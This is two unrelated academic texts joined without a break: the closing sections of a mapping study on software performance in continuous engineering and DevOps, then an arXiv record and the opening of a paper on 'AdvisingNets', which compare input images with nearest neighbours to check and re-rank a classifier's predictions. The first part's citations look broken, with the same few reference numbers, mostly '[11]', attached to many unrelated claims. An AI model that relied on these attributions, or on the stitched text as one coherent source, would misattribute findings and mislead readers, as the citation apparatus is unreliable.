The methodologies and techniques that are employed in the approaches of our study represent a compelling source of information for discovering the current research interests and gaps. For instance, when examining the use of performance models (Figure 18), it is clear that the DevOps and agile research areas lag behind the other areas in terms of the number of papers. A different picture is presented by performance testing, as shown in Figure 19. In this case, while all the research areas are almost equally represented, a lack of focus on the adoption of performance testing, load testing, and benchmarking is evident in real-time and embedded systems, as the number of papers contributing to the above-mentioned aspects in these systems is 0 and 3, respectively. Generation or extraction of a performance model (Figure 20) is a special use case in the adoption of performance models. Therefore, unsurprisingly, we can still count only a few papers in the DevOps and agile research areas, whereas distributed and microservice systems seem to rely the most on the automated generation of performance models. Finally, in regard to the use of simulation (shown in Figure 21), we observed that, in contrast to other methodologies, simulation has been employed in several papers for real-time and embedded systems. In addition, DevOps and agile appear to be less represented than the other research areas.

### Output measures and indices

Concerning the output measures, Figures 22 and 23 report the coverage of _response time_ and _memory / memory leaks_ across research areas and target systems in our study. Even more interesting is the fact that _DevOps_ and _agile_ seem not to consider memory at all in any target system. We expect memory use to become critical as ML and data-intensive systems continue to increase. In contrast, response time is considered more often in general, and in particular in the domains of _distributed systems_, _software intensive systems_, and _CBS/SOA/microservices_. This paints a picture in which performance measures that impact the quality of service are the foremost concern in research related to CSE, thus resulting in a substantial gap in the investigation of issues related to memory usage and how these can affect the cost of providing a service.
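As a small, self-contained illustration of why memory deserves more attention as an output measure, the sketch below fits a linear trend to periodically sampled resident memory of a service and flags a possible leak when the growth rate exceeds a tolerance. The sampling interval, the threshold, and the sample values are assumptions made only for this example.

```python
import numpy as np

def leak_suspected(rss_mb, interval_s=60.0, max_growth_mb_per_h=5.0):
    """Fit a linear trend to resident-memory samples (in MB) taken every
    `interval_s` seconds and flag growth beyond the given tolerance."""
    t_hours = np.arange(len(rss_mb)) * interval_s / 3600.0
    slope_mb_per_h = np.polyfit(t_hours, np.asarray(rss_mb, dtype=float), 1)[0]
    return slope_mb_per_h > max_growth_mb_per_h, slope_mb_per_h

# Hypothetical samples: resident memory creeps up by ~0.5 MB per minute.
samples = [512 + 0.5 * i for i in range(120)]
flag, slope = leak_suspected(samples)
print(f"leak suspected: {flag} (~{slope:.1f} MB/h)")
```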
### Discussion on research gaps

As is evident from the results reported above in this section, there is a noticeable difference in coverage between the more established and the emerging research topics. The more general performance evaluation topic is a clear example. It is among the most investigated topics in our study, not only because it is understandably at the center of our inquiry, but also because it is a well-established research topic with a history spanning decades. Nonetheless, when the same topic is combined with more recent trends in the software industry, such as agile and DevOps, it clearly lags behind with respect to the number of papers covering it. Apart from the obvious reason that more recent topics possibly receive less coverage in research, a more compelling justification can be found in the specific characteristics of agile processes and practices. In fact, agile cycles are usually considerably short, as the main focus of such cycles is possibly the fast release of new features. While some tests, such as acceptance tests from the product owner, are understandably required before releasing a new feature, performance tests are usually not considered necessary, as they are often very demanding in terms of time and resources. A possible solution might be to classify new requirements with low and high performance priority and contemplate dedicating a considerable budget to performance analysis and testing. Similarly, the specific needs of cloud-native systems do not always align with the requirements of performance evaluation. Most cloud-native systems adopt continuous tracing tools (Jaeger, OpenTelemetry, and AppDynamics) that record execution traces in highly distributed and dynamic environments. Such tools may allow performance analysis to be conducted, as they usually provide additional information that is relevant to performance, such as the execution time of remote calls. However, companies do not conduct performance analytics on distributed traces as long as performance does not compromise the user experience. Continuous assessment and improvement of performance are still not considered priority quality tasks, leading to software systems and services that quickly degrade their performance [47]. This leads us to believe that a subsequent study that considers the industry (a multivocal literature review) may be of interest.

In contrast to agile, DevOps, and cloud, the topic of uncertainty in software engineering has been relevant for some time. Even so, it still represents an emerging topic in research, especially when considering performance evaluation in uncertain settings. Evaluating performance in the presence of uncertainty is inherently difficult. The characteristics of software systems are becoming more dynamic owing to many factors: they are more distributed because they are moving to the cloud or are composed of third-party software, they are open to a wider group of users, and, more importantly, they are expected to provide QoS guarantees in ever-changing environments. In this context, performance evaluation must consider fluctuating workloads and great variability in resource demands, posing more challenges to the accuracy and validity of the prediction and analysis of performance results over time. To address this problem, researchers have started to study software performance under uncertainty, and our study finds that this is a research area not yet sufficiently investigated, but one that may possess great growth potential.
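To make the idea of propagating parameter uncertainty concrete, the sketch below samples an uncertain arrival rate and service demand and pushes them through the closed-form M/M/1 mean response time, reporting an interval instead of a single point estimate. The distributions and parameter values are illustrative assumptions, not data from the selected papers.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 10_000

# Uncertain workload and resource demand (illustrative distributions).
arrival_rate = rng.normal(loc=80.0, scale=10.0, size=n)      # requests / s
service_demand = rng.normal(loc=0.010, scale=0.001, size=n)  # s / request

# Propagate through the M/M/1 mean response time R = D / (1 - lambda * D),
# keeping only the stable samples (utilization < 1).
util = arrival_rate * service_demand
stable = util < 1.0
response = service_demand[stable] / (1.0 - util[stable])

lo, hi = np.percentile(response, [5, 95])
print(f"stable fraction: {stable.mean():.2%}")
print(f"mean response time: {response.mean() * 1000:.1f} ms "
      f"(90% interval: {lo * 1000:.1f}-{hi * 1000:.1f} ms)")
```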
Figure 22: Output measures / indices - Response time.

Figure 23: Output measures / indices - Memory / Memory Leaks.

_Main findings:_

* Although performance evaluation is a very well established research topic, its conjunction with the latest trends in the software industry, such as agile and DevOps, is clearly lagging behind.
* Researchers have started to study software performance under uncertainty. The research area has not yet been sufficiently investigated, but may possess great growth potential.
* There is no evidence of the experience of companies in conducting performance analytics on cloud systems.

### Implications for future research

In this section we discuss the implications of this study and the challenges for future research.

#### 8.7.1 Towards a culture of quality in CSE

The results obtained suggest an interest in a culture of quality, indicating that analysis and verification occur early in the CSE pipeline (as for testing in DevOps), making it easier to discover and fix defects with a collaborative approach to product improvement. In order to bring up the quality characteristics of software (architecture) and support its continuous improvement (and re-architecting), QoS analysis must become an integrated activity in the entire software development lifecycle, which requires quality characteristics to be continuously exposed to analysis ([11] and [12]). As discussed earlier, most of the selected studies focused on a few of the performance properties. However, there is a need to strengthen the support for various properties of both performance and, in general, software quality during the continuous engineering of the system. Some challenging quality aspects to consider are: verification of correctness properties, such as architectural mismatches ([11]); evaluation of architectural runtime models with respect to fidelity ([21, 22]) and usefulness for human inspection ([12]); extending scalability by considering influencing factors such as variation in the complexity of user behavior in experiments [12]; supporting state management and resource provisioning mechanisms [11]; and introducing the time consumption of memory allocation and release operations to increase the prediction quality of the model [11]. Similarly, other QoS properties, such as reliability [11], consistency [11], safety and security, and availability [12], can be modeled and analyzed in a CSE framework.

#### 8.7.2 Performance engineering benefits in DevOps

DevOps is gaining widespread adoption in industry. However, its principles of rapid changes, development automation, and fast feedback loops (often relying on dynamic cloud environments) conflict with the complexity of the current performance engineering approaches [18]. Thus, performance engineering frameworks should be improved for adoption in rapidly changing systems. The structures and behaviors of modern systems change frequently and require continuous relearning of the failure models in order to retain prediction quality [11]. Moreover, these systems are characterized by a continuous stream of available data. Performance models should be built periodically, incrementally, or even continuously, and be triggered by changes to components in the monitored environment. Models can be quickly rebuilt once a potential problem is detected, using only the most recent data, and then used to compare with previous model results [11].
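A minimal sketch of such periodic, windowed model updating is given below: it re-estimates the service demand of each component from the most recent monitoring window via the Service Demand Law (\(D_{k} = U_{k} / X\)) and reports the components whose demand drifted notably from the previous model. The component names, the window contents, and the drift threshold are assumptions used for illustration only.

```python
def estimate_demands(window):
    """Service Demand Law: D_k = U_k / X, with U_k the measured utilization of
    component k and X the measured system throughput for the window."""
    throughput = window["throughput_rps"]
    return {k: u / throughput for k, u in window["utilization"].items()}

def drifted(old, new, rel_tol=0.25):
    """Return the components whose estimated demand changed by more than rel_tol."""
    return {k: (old[k], new[k]) for k in new
            if k in old and abs(new[k] - old[k]) / old[k] > rel_tol}

# Hypothetical monitoring windows (utilization in [0, 1], throughput in requests/s).
previous = {"throughput_rps": 100.0, "utilization": {"web": 0.40, "db": 0.20}}
latest   = {"throughput_rps": 120.0, "utilization": {"web": 0.46, "db": 0.42}}

old_model, new_model = estimate_demands(previous), estimate_demands(latest)
print(drifted(old_model, new_model))  # only the "db" demand drifted (by ~75%)
```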
#### 8.7.3 Data-driven methods and Machine Learning

Performance and load tests produce a large amount of data that can be difficult to analyze. Data-driven methods provide powerful insights into optimizing performance, building new features, and preventing problems with services, especially in distributed (enterprise) applications, in-memory databases, and big data systems [11]. Despite developments in modern software engineering technology, there is no established methodology for systematically employing performance engineering and data-driven engineering in continuous development. In addition, performance evaluation based on machine learning can become an integral part of the continuous engineering process [11]. The performance model must learn autonomously and improve itself during system operation in a production environment [11].

#### 8.7.4 Continuously controlling system uncertainty

As discussed in Sections 6 and 8, uncertainty has been addressed only marginally in the papers selected in this study. However, both in academia and industry, significant attention is paid to contexts characterized by a high degree of uncertainty. To reduce uncertainty and obtain feedback on products/software as soon as possible, it is important to test assumptions and hypotheses in short cycles [10]. Continuous monitoring and frequent re-assessment and re-architecting are necessary to reduce the uncertainty in CSE and DevOps [11]. An efficient analysis method can be used to propagate the effect of uncertain parameters in software systems and calculate the robustness of the performance indices, thereby enhancing the flexibility in addressing uncertainty ([11]).

#### 8.7.5 Integration and abstraction

A recurring issue is the need to integrate methods and tools into continuous and DevOps pipelines. Hence, it is necessary to design and develop performance engineering approaches that can be integrated with other tools and methods used in the context of this study [11]. Continuous monitoring is a fundamental process in CSE. In the context of implications for future research, further investigation of adaptive monitoring and analysis infrastructures that can automatically update the system and performance/quality models is needed ([11], [11], [12], [13] and [11]). External capabilities can be integrated using approaches that represent systems as black-box components by integrating black-box monitoring techniques [14], or by creating resource profiles describing specific enterprise applications (using standard measurement solutions) instead of relying on a custom solution to collect the required data [13]. This can be improved by supporting the collection of arbitrary information on the status of the monitored application, which requires the corresponding type of system integration on a dynamic basis [13]. Using a higher abstraction level can help reduce the integration effort. Future research can target the development of a model-based framework that considers the definition of (domain-specific) languages and automation mechanisms to ensure, by design, the potential for monitoring, analysis, testing, and simulation in CSE. As discussed above, machine learning-supported and data-driven approaches can be used to (continuously) learn and tune the models.

#### 8.7.6 Implications for practitioners and researchers

Practitioners can benefit from the presented results to understand how software performance engineering and software architecture can support practices in CSE and DevOps.
Moreover, they can benefit from the classification of methodologies applicable to architectural support for performance engineering in the context of continuous software development. Researchers can benefit from our results to understand research trends and research gaps, and to better focus their future work. In particular, the software performance community can leverage this work to understand whether their approaches are applicable in a CSE/DevOps context. Moreover, this study helps them define the requirements that drive the development of their tools to increase the chances of industrial adoption. In turn, researchers in the field of CSE/DevOps can identify which methodologies and techniques can help improve software performance at some stage of the development cycle.

_Main findings:_

* There is a growing interest in a culture of quality, where quality properties are continuously exposed to analysis and verification during the software development life-cycle;
* Current performance engineering approaches should reduce their complexity to improve their suitability for the DevOps principles of rapid changes, development automation, and fast feedback loops;
* There is a need for an established methodology for the systematic employment of performance engineering and machine learning/data-driven engineering in continuous development;
* Continuous monitoring and frequent re-assessment and re-architecting are necessary to reduce uncertainty in CSE and DevOps;
* Using a higher abstraction level (i.e., by means of a model-based framework or (domain-specific) languages and automation mechanisms) can help in reducing the effort of integrating heterogeneous methods and components in systems.

## 9 Threats to Validity

Systematic Literature Review results might be affected by some threats, mainly related to the correctness and completeness of the survey. In this section, we discuss these threats according to the guidelines proposed by Wohlin et al. [12]: construct, internal, external, and conclusion validity threats. Moreover, we identify the actions required to mitigate them.

### Construct validity

Construct validity is related to the generalization of the result to the concept or theory behind the execution of the study [12]. We identified threats related to the potentially subjective analysis of the selected studies. As recommended by the guidelines of Kitchenham [11], data extraction was performed independently by two or more researchers and, in case of discrepancies, a third author was involved in the discussion to resolve any disagreement. The quality of each selected paper was checked according to the protocol proposed by Dyba and Dingsoyr [13].

### Internal validity

Internal validity threats are related to possible incorrect conclusions about the causal relationships between the treatment and the outcome [12]. In the case of secondary studies, internal validity represents how well the findings represent those reported in the literature. To address these threats, we rigorously defined the study protocol, including the data-extraction form. The data extraction form was first validated by all authors by extracting information from 10 randomly selected papers. Considering the data analysis process, threats are minimal, as we only adopted descriptive statistical techniques when dealing with quantitative data. When considering qualitative data, keywords were defined using a semi-automated approach to transform them into quantitative data.
As regards keyword definition, we first applied natural language techniques to reduce the subjectivity of the selected terms and then manually refined the keywords collaboratively. Finally, 10 studies were randomly selected by all the researchers to verify whether the results were consistent, independent of the researcher performing the extraction. Disagreements were discussed and resolved collaboratively when needed.

### External validity

External validity threats are related to the ability to generalize the results [12]. In secondary studies, the external validity depends on the representativeness of the selected studies. If the selected studies are not externally valid, the synthesis of their content is not valid either. In our study, we were not able to evaluate the external validity of all the included studies. To address this threat, we applied our search string to multiple bibliographic sources, including Springer Link, Scopus, the ACM Digital Library, and the IEEE Xplore Digital Library. The use of different bibliographic sources enabled us to obtain the vast majority of relevant papers. Moreover, we also complemented our search by performing a snowballing activity. The inclusion of papers written only in English may have biased our results. Studies in other languages may be relevant. However, we adopted English only as it is the language most widely used for scientific papers, and we can consider the bias related to this threat as minimal. We only included peer-reviewed papers, without considering grey literature (e.g., technical reports, master theses, and web forums). Because we aimed to identify only high-quality scientific studies, we believe that this threat is minimal.

### Conclusion validity

Conclusion validity is related to the reliability of the conclusions drawn from the results [50]. One such threat is related to the potential non-inclusion of some studies. To mitigate this threat, we carefully applied the search strategy and performed the search in eight digital libraries, in conjunction with the snowballing process, considering all the references presented in the retrieved papers and evaluating all the papers that reference the retrieved ones, which resulted in one additional relevant paper. We applied a broad search string, which led to a large set of articles and enabled us to include more possible results. We defined the inclusion and exclusion criteria and first applied them to the title and abstract. However, we did not rely exclusively on titles and abstracts: before accepting a paper based on the title and abstract, we browsed the full text and applied our inclusion and exclusion criteria again. Another possible conclusion validity threat is related to the incorrect interpretation of the results. To mitigate this threat, all authors carefully reviewed the results. However, other researchers may provide different interpretations.

## 10 Conclusion

This paper presented a mapping study on the architectural support for SP within CSE. Of 215 relevant studies, we selected \(66\) primary studies, which were analyzed to answer our research questions. Thus, we have taken a deeper look at the research context and provided ideas to researchers and developers for addressing the challenges related to this topic, including knowledge gaps and future topics of research that have not yet been thoroughly investigated in this context.
In particular, we analyzed the publication trends, the research areas and target systems, the target problems and contributions, and specific characteristics of the selected primary studies through a classification framework. This study shows that SP and SA are aspects well considered in CSE, where the most affected dimensions are continuous monitoring and continuous improvement. The results of this study also show that SPE approaches and methodologies are sufficiently mature (owing to the support of specific frameworks and tools) to be applied in continuous practices, with a prevalence in the use of data monitored at runtime. In general, SA is considered to offer specific support; in many cases, SA models are used as input for the analysis and prediction of performance as well as of architectural parameters and configurations. More support has been provided to distributed systems, component-based systems, SOA, microservices, and software intensive systems in general. Other contexts, such as data-intensive or embedded systems, have fewer applications. The most interesting gaps are identified in cloud systems and in systems where uncertainty needs to be investigated.

## Acknowledgments

This work was partially supported by the Adams grant from the Ulla Tuominen Foundation (Finland) and the MuFAno grant from the Academy of Finland (grant n. 349488), the AIDOaRt project grant from the ECSEL Joint Undertaking (JU) (grant n. 101007350), the Territori Aperti project funded by Fondo Territori, Lavoro e Conoscenza CGIL CISL UIL, and the SoBigData RI project funded by H2020-INFRAIA-2019-1 EU (grant n. 871042). Daniele Di Pompeo is supported by the European Union - NextGenerationEU - National Recovery and Resilience Plan (Piano Nazionale di Ripresa e Resilienza, PNRR) - Project: "SoBigData.it - Strengthening the Italian RI for Social Mining and Big Data Analytics" - Prot. IR0000013 - Avviso n. 3264 del 28/12/2021. Michele Tucci is supported by the OP RDE project No. CZ.02.2.69/0.0/0.0/18_053/0016976 "International mobility of research, technical and administrative staff at Charles University".
2308.13651
PCNN: Probable-Class Nearest-Neighbor Explanations Improve Fine-Grained Image Classification Accuracy for AIs and Humans
Nearest neighbors (NN) are traditionally used to compute final decisions, e.g., in Support Vector Machines or k-NN classifiers, and to provide users with explanations for the model's decision. In this paper, we show a novel utility of nearest neighbors: to improve predictions of a frozen, pretrained image classifier C. We leverage an image comparator S that (1) compares the input image with NN images from the top-K most probable classes given by C; and (2) uses scores from S to weight the confidence scores of C to refine predictions. Our method consistently improves fine-grained image classification accuracy on CUB-200, Cars-196, and Dogs-120. Also, a human study finds that showing users our probable-class nearest neighbors (PCNN) reduces over-reliance on AI, thus improving their decision accuracy over prior work, which shows only the most-probable (top-1) class examples.
Giang, Nguyen, Valerie Chen, Mohammad Reza Taesiri, Anh Totti Nguyen
2023-08-25T19:40:56Z
http://arxiv.org/abs/2308.13651v5
# AdvisingNets: Learning to Distinguish Correct and Wrong Classifications ###### Abstract Besides providing insights into how an image classifier makes its predictions, nearest-neighbor examples also help humans make more accurate decisions. Yet, leveraging this type of explanation to improve both human-AI team accuracy and classifier's accuracy remains an open question. In this paper, we aim to increase both types of accuracy by (1) comparing the input image with post-hoc, nearest-neighbor explanations using a novel network (AdvisingNet), and (2) employing a new reranking algorithm. Over different baseline models, our method consistently improves the image classification accuracy on CUB-200 and Cars-196 datasets. Interestingly, we also reach the state-of-the-art human-AI team accuracy on CUB-200 where both humans and an AdvisingNet make decisions on complementary subsets of images. ## 1 Introduction A goal of Explainable AI (XAI) is to provide humans with insights to evaluate the predictions of classifiers. By examining how a model "reasons" about a given input, users can better decide whether a classifier makes a correct prediction or not [3]. In computer vision, this is a non-trivial task and many explanation methods (such as feature-attribution maps) fail to improve human accuracy [13, 14, 15]. In contrast, there is growing evidence demonstrating the effectiveness of example-based explanations in improving human decisions, particularly when using techniques like nearest neighbors (NNs) [16, 17, 18, 19]. Intuitively, if the input image is more similar to its nearest neighbors (NNs) from the classifier's top-1 predicted class than those from the other classes, then the top-1 label should be correct and so accepted by human users (see Fig. 1). Otherwise, the top-1 label should be incorrect and rejected by users. Inspired by this idea, we train a VisionTransformer-based classifier called AdvisingNet (Fig. 2b) that predicts whether the output label of a given classification model is correct or wrong by comparing the input image with its nearest neighbors. To train AdvisingNets, we propose a novel sampling procedure to generate image pairs, which consist of the input image and its nearest neighbors derived from both the ground-truth and the other classes. We demonstrate the utility of AdvisingNets on fine-grained CUB-200 [23] and Cars-196 [15] classification tasks. Our main findings are: * On CUB-200, AdvisingNets achieve up to 90.63% in predicting correct vs. wrong predictions, surpassing the human baseline by +25.88 points (pts), an optimized AI agent by +3.23 pts, and a team of human+AI by +4.80 pts (Table 1). * We propose an algorithm called Top-class Reranking (TCR) that re-ranks the top-predicted classes of pre-trained classifiers. TCR improves the accuracy of a bird classifier (based on an iNaturalist-pretrained ResNet-50 backbone) by +2.17 pts on CUB-200 (Table 2) and a car classifier (based on ImageNet-pretrained ResNet-50 backbone) by +0.64 pts on Cars-196 (Table 3). On CUB, our method also outperforms other prototype-based classifiers, such as prototypical part-based (e.g., ProtoPNet) and visual correspondence-based classifiers. 
* We find that AdvisingNets, when used with TCR, not only improve the accuracy of target classifiers seen during training but also that of unseen classifiers plugged in at test time. We find that the effectiveness of AdvisingNets generalizes over different target classifiers (when using TCR), different network architectures, and different numbers of nearest neighbors. Figure 1: Given an input image \(x\) and a pretrained, frozen classifier \(\mathbf{C}\) that predicts the output for \(x\), humans can discern whether the model has made a correct prediction or not by comparing \(x\) with its training-set nearest neighbors (NN), derived from the predicted classes [18]. In this paper, we train AdvisingNets to mimic humans and to choose **Painted Bunting** over the **Indigo Bunting** label for this example. ## 2 Framework We first present the details for training AdvisingNets and their two downstream tasks. ### Training AdvisingNets Problem formulation. Assessing whether a classifier's prediction is correct or not is an inherent task that every stakeholder needs to perform when working on high-stakes AI applications. Inspired by prior work that shows the effectiveness of NN examples for humans to classify machine predictions (Fig. 1), we reduce the task of distinguishing between correct and incorrect predictions to assessing whether the input image \(x\) and its NNs from predicted classes are of the same class (i.e., similarity prediction). Let \(\mathbf{C}\) be an image classifier that transforms an image \(x\) into a softmax probability distribution \(\mathbf{P}\) over all classes. \(x\) has a ground-truth label \(y\) (e.g., Painted Bunting in CUB; Fig. 1). Let \(A\) be a binary, image-comparison classifier that takes in two images and predicts whether they belong to the same class (Fig. 2b). We call this classifier an AdvisingNet because, when coupled with the TCR algorithm, it allows us to improve \(\mathbf{C}\)'s predictions by pinpointing the ground-truth label, which is likely to be among the top-predicted classes (Sec. 2.2). Let \(\mathbf{T}\) be a set of top-ranked classes in \(\mathbf{P}\). From each class in \(\mathbf{T}\), we retrieve the nearest neighbors \(x_{nn}\) of \(x\) to establish image pairs \((x,x_{nn})\) for training \(A\). The pair is labeled 1 (positive) if \(x_{nn}\) is selected from the ground-truth class \(y\). Otherwise, for a negative pair with label 0, \(x_{nn}\) is sampled from a class different from \(y\) (Fig. 2a). For each pair \((x,x_{nn})\), \(A\) computes a logit score \(s\in\mathbb{R}\), which is then converted into a probability using a sigmoid function, \(\hat{y}=\sigma(s)\), where \(\sigma(s)=\frac{1}{1+e^{-s}}\). The resulting probability is thresholded at 0.5 to yield the final binary classification (see Fig. 2b). With \(B\) training samples, and a true binary label \(y_{i}\) (Accept or Reject) for each \(i\)-th sample pair, we train \(A\) to minimize the following binary cross-entropy (BCE) loss: \[L_{BCE}=-\frac{1}{B}\sum_{i=1}^{B}\left[y_{i}\log(\sigma(s_{i}))+(1-y_{i})\log(1-\sigma(s_{i}))\right] \tag{1}\]
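To make this objective concrete, the following is a minimal PyTorch-style sketch of one optimization step for \(A\); the names `advising_net`, `optimizer`, and the argument layout are illustrative placeholders rather than the authors' released code.

```python
import torch
import torch.nn.functional as F

def training_step(advising_net, optimizer, x, x_nn, labels):
    """One BCE training step (Eq. 1): `advising_net` maps an (x, x_nn) pair to a
    logit s; `labels` holds 1 for positive pairs (x_nn from the ground-truth
    class) and 0 otherwise."""
    logits = advising_net(x, x_nn).squeeze(-1)                          # shape: (B,)
    loss = F.binary_cross_entropy_with_logits(logits, labels.float())  # Eq. (1)
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    return loss.item()
```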
Sampling positive and negative neighbors. Given an input image \(x\), instead of randomly picking NNs for generating \((x,x_{nn})\) pairs, we propose a novel sampling method that selectively chooses \(x_{nn}\) based on the output of the pre-trained model \(\mathbf{C}\) on \(x\), as shown in Fig. 2a. For each image in the top-\(Q\) classes, we mark the \((x,x_{nn})\) pairs as positive (+) or negative (-) accordingly, depending on whether the ground-truth label of \(x\) matches these classes (see Fig. 2a). To help AdvisingNets detect subtle differences between similar-looking species (which are more often misclassified and co-present in the top-predicted classes [11, 12]), we consider only the top-\(Q\) classes (empirically, \(Q\in\{3,5,10,15\}\)) returned by the classifier \(\mathbf{C}\) for an input \(x\). NNs taken from classes outside the top-\(Q\) are often clearly different from the input \(x\) and do not serve as _hard_ negatives. With one image per class, this sampling strategy yields at most 1 positive instance and at least \(Q-1\) negative instances (e.g., \(Q\) negative instances if the ground-truth label does not appear in the top \(Q\) classes). Given that \(x\) is part of the training set of classifier \(\mathbf{C}\), it is likely that the top-1 predicted class matches the ground-truth label. To increase the number of positive samples and help AdvisingNets deal with intra-class variations, we sample \(K\) neighbors from the top-1 class to derive \(K\) positive pairs. The retrieved nearest neighbors are ranked based on the Euclidean distances (using the faiss framework) between their embeddings (i.e., the average pooling features of the last conv layer of \(\mathbf{C}\)) and that of the input image. Note that the first nearest neighbor from the ground-truth class is typically the same as \(x\) itself. As such, we exclude this pair. For each sample \(x\), we thus form \(Q+K-1\) pairs for training AdvisingNets. When the top-1 predicted class matches the ground-truth label, our method generates \(K\) positive pairs and \(Q-1\) negative pairs. In contrast, when the top-1 predicted class does not match the ground-truth label, we obtain a minimum of \(Q+K-2\) negative pairs and a maximum of one positive pair. Refer to Sec. A12 for examples of training pairs.
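The following is a minimal sketch of this sampling procedure, assuming hypothetical helpers `top_q_classes` (the top-\(Q\) class indices from \(\mathbf{C}\)) and `retrieve_nns` (a faiss-style nearest-neighbor lookup restricted to one class). It illustrates the pair-counting logic above and is not the authors' implementation.

```python
def sample_training_pairs(x, y_true, top_q_classes, retrieve_nns, K=10):
    """Build (x, x_nn, label) pairs: K pairs from the top-1 class (positive only
    when that class is the ground truth) plus one pair per remaining top-Q class,
    yielding Q + K - 1 pairs per sample."""
    pairs = []
    top1 = top_q_classes[0]
    nns = retrieve_nns(x, top1, k=K + 1)
    if top1 == y_true:
        nns = nns[1:]                 # drop the first NN, which is x itself
    for x_nn in nns[:K]:
        pairs.append((x, x_nn, int(top1 == y_true)))
    # One neighbor from each of the remaining Q - 1 top-predicted classes.
    for cls in top_q_classes[1:]:
        x_nn = retrieve_nns(x, cls, k=1)[0]
        pairs.append((x, x_nn, int(cls == y_true)))
    return pairs
```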
Hybrid architecture. AdvisingNets harness the power of both convolutional and Transformer layers (Fig. 2b). We initialize the convolutional layers with pretrained weights from \(\mathbf{C}\) to encode input images. For the Transformer layers, we adopt the CrossViT backbone [10] for comparing the features between two images. The two branches correspond to the two input images fed into AdvisingNets. Different from CrossViT, our two branches handle the same image scale and share the weights, which makes AdvisingNets more compact. We also exclude the linear projection in conventional ViT [13] as the conv layers are already able to provide patch-level tokens. In sum, the layers of AdvisingNets are: \[\begin{split}&\mathbf{x}_{\text{conv1}}=\mathbf{f}\left(\mathbf{x}\right);\quad\mathbf{x}_{\text{conv2}}=\mathbf{f}\left(\mathbf{x}_{nn}\right)\\ &\mathbf{x}_{1}=\left[\mathbf{x}_{cls}\,\|\,\mathbf{x}_{\text{conv1}}\right]+\mathbf{x}_{\text{pos}};\quad\mathbf{x}_{2}=\left[\mathbf{x}_{cls}\,\|\,\mathbf{x}_{\text{conv2}}\right]+\mathbf{x}_{\text{pos}}\\ &\mathbf{y}_{1}=\mathbf{x}_{1}+\mathrm{MHSA}(\mathbf{x}_{1});\quad\mathbf{y}_{2}=\mathbf{x}_{2}+\mathrm{MHSA}(\mathbf{x}_{2})\\ &\mathbf{z}_{1},\mathbf{z}_{2}=\mathrm{CrossAttn}\left(\mathbf{y}_{1},\mathbf{y}_{2}\right)\\ &\mathbf{o}=\mathrm{concat}\left(\mathbf{z}_{1}[0,:],\mathbf{z}_{2}[0,:]\right)\\ &\mathbf{s}=\mathrm{MLPs}\left(\mathbf{o}\right)\end{split} \tag{2}\] First, the output of the conv layers \(\mathbf{f}\) has a shape of \(\mathbb{R}^{D\times H\times W}\), where \(D\) is the number of convolution channels. \(\mathbf{x}_{cls}\in\mathbb{R}^{1\times D}\) and \(\mathbf{x}_{\text{pos}}\in\mathbb{R}^{(1+N)\times D}\) are the CLS token and positional embedding, respectively. Each image is represented by \(H\times W\) patch tokens with a dimension of \(D\). We flatten and transpose the conv feature vectors of the two images to get \(\mathbf{x}_{\text{conv1}},\mathbf{x}_{\text{conv2}}\in\mathbb{R}^{N\times D}\) (e.g., \(N=49\) and \(D=2048\) for ResNet-50 conv4). After adding the CLS token and positional embedding, the two encoded images \(\mathbf{x}_{1}\) and \(\mathbf{x}_{2}\in\mathbb{R}^{(1+N)\times D}\) are fed into the Transformer layers. \(\mathrm{MHSA}\) is the self-attention operator and \(\mathrm{CrossAttn}\) denotes the Cross-Attention token fusion approach in CrossViT, producing \(\mathbf{y}_{1},\mathbf{y}_{2}\) and \(\mathbf{z}_{1},\mathbf{z}_{2}\in\mathbb{R}^{(1+N)\times D}\). Then, we extract the CLS tokens from \(\mathbf{z}_{1},\mathbf{z}_{2}\) and concatenate them to generate \(\mathbf{o}\in\mathbb{R}^{2\times D}\), which serves as input for multilayer perceptrons (MLPs). The MLPs output a logit score \(\mathbf{s}\in\mathbb{R}\) that quantifies the degree of similarity between the two input images. Finally, a sigmoid layer is applied to obtain the confidence score for the classifier. Thresholding is performed at \(0.5\) to yield binary predictions.
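To make the composition in Eq. (2) concrete, below is a minimal PyTorch-style sketch of the forward pass. The module names (`conv_encoder`, `self_blocks`, `cross_block`, `mlp_head`) and the default dimensions are illustrative assumptions, not the released architecture.

```python
import torch
import torch.nn as nn

class AdvisingNetSketch(nn.Module):
    """Illustrative forward pass mirroring Eq. (2); not the authors' code."""
    def __init__(self, conv_encoder, self_blocks, cross_block, mlp_head,
                 num_patches=49, dim=2048):
        super().__init__()
        self.f = conv_encoder                      # shared conv layers taken from C
        self.self_blocks = self_blocks             # MHSA blocks (weights shared across branches)
        self.cross_block = cross_block             # CrossViT-style cross-attention fusion
        self.mlp_head = mlp_head                   # MLPs -> scalar logit s
        self.cls = nn.Parameter(torch.zeros(1, 1, dim))                 # x_cls
        self.pos = nn.Parameter(torch.zeros(1, 1 + num_patches, dim))   # x_pos

    def tokenize(self, img):
        feat = self.f(img)                         # (B, D, H, W)
        tokens = feat.flatten(2).transpose(1, 2)   # (B, N, D), N = H * W
        cls = self.cls.expand(tokens.size(0), -1, -1)
        return torch.cat([cls, tokens], dim=1) + self.pos   # (B, 1+N, D)

    def forward(self, x, x_nn):
        x1, x2 = self.tokenize(x), self.tokenize(x_nn)
        y1 = x1 + self.self_blocks(x1)             # y = x + MHSA(x)
        y2 = x2 + self.self_blocks(x2)
        z1, z2 = self.cross_block(y1, y2)          # cross-attention token fusion
        o = torch.cat([z1[:, 0, :], z2[:, 0, :]], dim=-1)   # concatenate CLS tokens
        return self.mlp_head(o)                    # logit s; sigmoid applied downstream
```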
### Downstream applications of AdvisingNets #### Task 1: Human-AI teaming on Accepting/Rejecting AI decisions We follow the experimental setups for human-AI collaboration from [11], where humans and AIs work on complementary image subsets to accept and reject a pretrained model's predictions. In the original setup, a confidence threshold was computed to determine for which instances the human or the AI should be making decisions, so that the AI would only make decisions for instances it was most confident on. Our approach substitutes the naive AI agent, referred to as Thresholding, with the AdvisingNet (see Sec. A4 for further details). #### Task 2: Single-label image classification While AdvisingNets can differentiate correct and incorrect predictions of a pretrained classifier \(\mathbf{C}\), we study how to use them to improve \(\mathbf{C}\) in image classification tasks. We introduce an algorithm called **Top-classes Reranking** or TCR (Algorithm 1), which _re-ranks_ the top-predicted classes, initially given by \(\mathbf{C}\). Specifically, upon receiving an image \(x\), \(\mathbf{C}\) makes an initial set of predictions \(\mathbf{P}\). The top-\(Q\) classes are selected for re-ranking (L2-4), where for each class, the AdvisingNet computes a confidence score between the input image \(x\) and the representative image of the class (the closest NN). The class that yields the highest confidence score is chosen as the final predicted class 